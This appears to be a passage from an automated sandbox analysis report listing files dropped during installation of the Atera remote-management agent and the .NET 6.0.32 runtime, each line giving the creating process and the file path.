                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Win32.TaskScheduler.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encoding.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebSockets.Client.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Extensions.Hosting.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Memory.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.CoreLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBB92.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XPath.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.X509Certificates.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Console.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.SecureString.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\IdleTimeFinder.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\fr\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.Win32.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.Xml.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Cng.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDBCF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Numerics.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Polly.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Debug.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.Immutable.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: 4c999a.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Tracing.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscordaccore.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.Parallel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Xml.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Text.Encodings.Web.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Globalization.Calendars.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XmlSerializer.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Ping.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Windows.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSID8C1.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBC4E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Pipes.AccessControl.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSID8C1.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\de\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Abstractions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.AppContext.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.MemoryMappedFiles.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.RegularExpressions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\RunScriptAsUser.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.AccessControl.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Channels.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.Watcher.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.ServiceProcess.ServiceController.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x86\SQLite.Interop.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\NLog.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.Queryable.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.SecureString.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.EnvironmentVariables.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Numerics.Vectors.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Memory.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.StackTrace.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.EventBasedAsync.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSID8C1.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\coreclr.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Emit.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Options.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Transactions.Local.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\ru\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI9B15.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Thread.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XmlSerializer.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Formats.Asn1.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.FileSystem.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1CA.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI9B15.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Overlapped.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\CliWrap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIB4E8.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.NonGeneric.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Globalization.Extensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\ucrtbase.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Transactions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.UnmanagedMemoryStream.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Binder.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.ThreadPool.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.IsolatedStorage.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\createdump.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6E49.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\msquic.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3FD.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.ServicePoint.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Handles.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Tracing.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.XDocument.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscorrc.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Drawing.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.Watcher.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Timer.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscordaccore_amd64_amd64_6.0.3224.31407.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.Parallel.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.HttpListener.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.DataAnnotations.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAC5.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\StructureMap.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA259.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscorlib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Numerics.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.Parallel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ValueTuple.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XDocument.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.DriveInfo.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Emit.Lightweight.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\clretwrc.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\clrjit.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Configuration.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.DataContractSerialization.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebSockets.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9B15.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscordbi.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\NLog.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIB4E8.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
